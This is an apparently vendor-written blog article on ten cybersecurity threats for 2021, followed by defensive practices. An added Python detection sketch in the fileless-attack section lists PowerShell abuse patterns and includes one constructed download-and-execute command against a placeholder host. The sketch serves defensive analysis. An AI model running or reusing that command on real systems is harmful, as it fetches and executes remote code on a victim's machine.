According to a report by Cybersecurity Ventures, global cybercrime costs are expected to grow by 15 percent per year over the next five years, reaching $10.5 trillion USD annually by 2025, up from $3 trillion USD in 2015. As businesses continue to adopt more innovative technologies to streamline operations, their risk of being exposed to a cyberattack is spiraling upward as well.
Cyberattacks have grown in sophistication and volume in 2020. Some estimates have put the increase in attacks during the pandemic at 400 percent or more. Businesses around the world are facing an unprecedented level of risk. That’s why IT security continues to be the No. 1 priority for IT teams, as reported in the Kaseya 2020 IT Operations Survey Report.
Cybersecurity Threats to Be Aware of in 2021
1. Cloud-Based Threats
With more companies digitally transforming and leveraging online collaboration tools in 2020, the migration to cloud computing also accelerated. The cloud will continue to shape the way businesses operate in 2021 and beyond.
According to IDC, global cloud services market spending is projected to reach USD $1 trillion in 2024, at a compound annual growth rate (CAGR) of 15.7 percent during the forecast period of 2020 to 2024.
However, this rapid migration to the cloud exposes businesses to a slew of security challenges and threats. Cloud app vulnerabilities, incomplete data deletion, misconfigurations in cloud storage, and diminished visibility and control are some of the common cloud services issues that increase cybersecurity risks.
2. Insider Threats
According to the 2020 Verizon Data Breach Investigations Report, nearly 30 percent of security breaches involve internal actors. Insider threats include both malicious attacks and the negligent use of data and systems by employees. These insider threats are expected to not only continue but spike in 2021 and beyond.
To stay secure against insider threats, companies must quickly and accurately detect, investigate and respond to issues that could be indicators of potential insider attacks. Since conventional antivirus and antimalware tools are not as effective against insider threats, you need specialized tools to safeguard your business against them.
These tools detect insider threats by monitoring:
- Unauthorized logins
- New apps installed on locked-down computers
- Users that were recently granted admin rights to a device
- New devices on restricted networks, and more
These tools may combine machine learning and intelligent tagging to identify anomalous activity, suspicious changes and threats caused by system misconfigurations.
3. Remote Worker Endpoint Security
2020 saw an unprecedented increase in the number of remote workers for businesses around the globe. Many companies are planning to make remote work permanent in 2021 and beyond. This opens up opportunities for hackers.
Remote workers often operate without any network perimeter security, thus missing out on a critical part of layered cybersecurity defense. Cybercriminals have quickly adapted to the remote working environment by exploiting cloud-based services, improperly secured VPNs and unpatched remote computers to hack into off-network systems. It’s critical for IT teams to use remote monitoring and endpoint management tools that can automatically patch off-network computers to help keep them secure.
4. Phishing Attacks
Phishing scams typically employ social engineering in traditional email and cloud services attacks. Phishing can result in Business Email Compromise (BEC), Account Takeover (ATO), credential theft, ransomware and other security breaches. Emails are typically disguised as messages from trusted individuals like a manager, coworker, or business associate to trick your employees into activating the enclosed malware or granting unauthorized access.
According to the 2020 Verizon Data Breach Investigations Report, 22 percent of breaches involved phishing.
Phishing attacks will continue to be carried out through cloud applications as well as via traditional emails. Organizations should take advantage of email phishing protection software and employee training to reduce the risk associated with these attacks.
5. Deepfakes
A deepfake is the use of machine learning and artificial intelligence (AI) to manipulate an existing image or video of a person to portray some activity that didn’t actually happen. There’s much speculation that deepfakes will continue to be a major cybersecurity threat in 2021 and beyond, often being used for malicious intent.
We might witness cybersecurity threats, such as deepfake usage for committing fraud through synthetic identities, and the emergence of deepfake-as-a-service organizations. 2021 might also be the year when deepfakes go on to render more convincing phishing scams than ever before, which could end up costing businesses billions of dollars.
6. IoT Devices
A Fortune Business report indicates that the Internet of Things (IoT) market is likely to grow to $1.1 trillion by 2026. Needless to say, this widespread use of IoT devices will herald a larger number of increasingly complex cybersecurity threats. There could also be a serious threat to the Internet of Medical Things (IoMT) that could develop into a grave Internet health crisis.
The fact that a majority of the new IoT devices are still in their infancy means that there’s a much larger attack surface for cybercriminals to target the vulnerabilities associated with these novel technologies. In addition, it is extremely difficult to develop cybersecurity strategies to keep up with the rapid emergence of new IoT devices.
7. Malvertising
Malvertising, a portmanteau of malicious advertising, is the use of online ads to spread malware. Generally this occurs through the injection of malicious code into ads that are then displayed on various websites through legitimate online advertising networks. Malvertising is expected to remain a critical cyberthreat in 2021.
Two of the recent trends in malvertising that may not be regarded as malware attacks include advertisements targeting mobile devices linked to “fleeceware” or fraudulent apps and technical support scams that employ “browser locking” of webpages. These novel cyberthreat trends may be classified as ‘fake alert’ attacks wherein the malvertisement is designed to frighten the target into taking an action that serves the interests of the scammer.
Technical support scams are focused on steering the targets in a way that they inadvertently provide remote access to their systems. The targets are then driven to either compromise their credit card data (which is used for fraudulent purposes) or subscribe to exorbitantly priced technical support services and software.
Scammers have also transitioned to the “pull” model, wherein they use malicious web ads to convince users that they have been locked out of their computers for security reasons and drive them to reach out to the scammers themselves.
8. Fileless Attacks and Living Off the Land
A subcategory of living off the land (LotL) attacks, fileless attacks exploit features and tools that are present in the victim’s environment. Such attacks do not depend on file-based payloads and usually do not generate new files. As a result, fileless attacks are often not identified by conventional detection and prevention (antivirus) solutions.
A fileless attack usually starts with an email that links to a malicious website. By employing social engineering tactics on the malicious website, the attacker can use system tools, such as PowerShell, to retrieve and execute payloads in system memory. Although fileless attacks have been around for decades, their significant success rate has ensured that they keep trending upwards.
Because the tools being used by the attackers are already present in the victim’s IT environment (like PowerShell), it’s hard to detect these malicious attacks. You will need to do more extensive behavioral analysis to determine that the tools are being used in a way that is abnormal.
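As an added illustration of that kind of behavioral analysis (not code from the original article), the sketch below scores process-creation records for PowerShell launches that look abnormal: an unusual parent process combined with command-line traits of in-memory payload retrieval. The record format, parent list, weights and threshold are assumptions made for this example, and the sample records are constructed.

```python
import re

# Assumed data for this example; tune parents, weights and threshold to your baseline.
UNUSUAL_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "msedge.exe"}
TRAITS = [  # (name, pattern, weight)
    ("encoded_command", re.compile(r"\s-e(c|n\w*)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("hidden_window", re.compile(r"\s-w\w*\s+hidden\b", re.I), 2),
    ("network_fetch", re.compile(r"net\.webclient|downloadstring|invoke-webrequest", re.I), 2),
    ("in_memory_exec", re.compile(r"\biex\b|invoke-expression", re.I), 2),
]
ALERT_THRESHOLD = 4

def score_event(line):
    """Score one 'parent|image|command line' record; return (score, reasons)."""
    parent, image, cmdline = line.split("|", 2)
    if image.lower() not in ("powershell.exe", "pwsh.exe"):
        return 0, []
    score, reasons = 0, []
    if parent.lower() in UNUSUAL_PARENTS:
        # Office apps and browsers rarely have a legitimate reason to spawn PowerShell.
        score, reasons = 3, ["unusual_parent:" + parent.lower()]
    for name, pattern, weight in TRAITS:
        if pattern.search(cmdline):
            score += weight
            reasons.append(name)
    return score, reasons

def triage(lines):
    """Return (score, reasons, record) for records that reach the alert threshold."""
    alerts = []
    for line in lines:
        score, reasons = score_event(line)
        if score >= ALERT_THRESHOLD:
            alerts.append((score, reasons, line))
    return alerts

# Constructed process-creation records (not real telemetry); the base64 blob is filler.
SAMPLE = [
    r"explorer.exe|powershell.exe|powershell.exe -File C:\Scripts\inventory.ps1",
    r"services.exe|powershell.exe|powershell.exe -ExecutionPolicy RemoteSigned -File C:\Ops\patch.ps1",
    r"WINWORD.EXE|powershell.exe|powershell.exe -NoP -W Hidden -Enc QUFBQUFBQUFBQUFBQUFBQUFBQUE=",
    r"chrome.exe|powershell.exe|powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
    r"explorer.exe|notepad.exe|notepad.exe C:\notes.txt",
]

if __name__ == "__main__":
    for score, reasons, line in triage(SAMPLE):
        print(score, reasons, line.split("|", 1)[0])
```

Routine administrative launches score zero here, while a single weak trait on its own stays below the threshold, which is the point of scoring combinations rather than matching on the tool name.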
9. Sophisticated and Targeted Ransomware Attacks
Ransomware attacks have been a major concern for businesses over the past several years. Ransomware’s success is largely owed to the relative simplicity with which an attacker can achieve devastating effects. Ransomware kits are dirt cheap and readily available on the Dark Web.
Ransomware operators have devised innovative ways to spread rapidly, dodge endpoint security protocols and launch successful attacks on targeted companies and individuals. This is a major cause for concern since the effects of a single ransomware attack can be extremely damaging to small and midsize businesses, leading to exorbitant costs associated with downtime and recovery.
Given their increasing sophistication, greater frequency and new targeted approach, it can be safely said that the cost of ransomware in 2021 will be much higher than in 2020. Cybersecurity Ventures’ report for 2020 estimates that the total cost of cybercrime damages in 2021 will exceed $6 trillion, of which the cost of damages caused by ransomware alone will be $20 billion.
Given the likelihood of falling victim to a ransomware attack, it’s critical to have a comprehensive backup strategy in place to protect your organization.
10. Social Media-Based Attacks
Social media has frequently been the medium of choice for launching various types of cyberattacks. We predict attackers are likely to transition from targeting individuals to targeting businesses in 2021. For example, cybercriminals might launch an attack by announcing a new product or a webinar mimicking a legitimate business. Once the user clicks on the registration URL, they would be redirected to a malicious website and driven to compromise personally identifiable information or credentials for multifactor authentication.
Inefficient verification and authentication practices further enable social media attacks to succeed. Abbreviated URLs and malicious QR codes might be employed to obscure malicious websites and launch cyberattacks either on the legitimate business account or through rogue accounts that use the same name.
Practical Strategies to Enhance IT Security
Fortunately, with a few simple steps you can bolster your IT security and protect your business.
- Automate patch and vulnerability management to keep your systems up to date and protected against cyberattacks that exploit known software vulnerabilities.
- Back up your systems and SaaS application data to ensure efficient and quick recovery from ransomware and other attacks.
- Deploy advanced AV/AM solutions that provide endpoint detection and response (EDR) and keep your systems secure.
- Make sure that any laptop or device that leaves the office has a full suite of security services, including a local firewall, advanced malware protection, DNS filtering, disk encryption and multifactor authentication.
- Have an incident response plan. Should a security breach occur, you need a robust action plan to efficiently deal with the breach and get your company back on its feet as quickly as possible, with minimum damage. The plan should include a communications strategy for both internal and external stakeholders, including customers and investors. The more you prepare in advance, the better equipped you will be to deal with a crisis.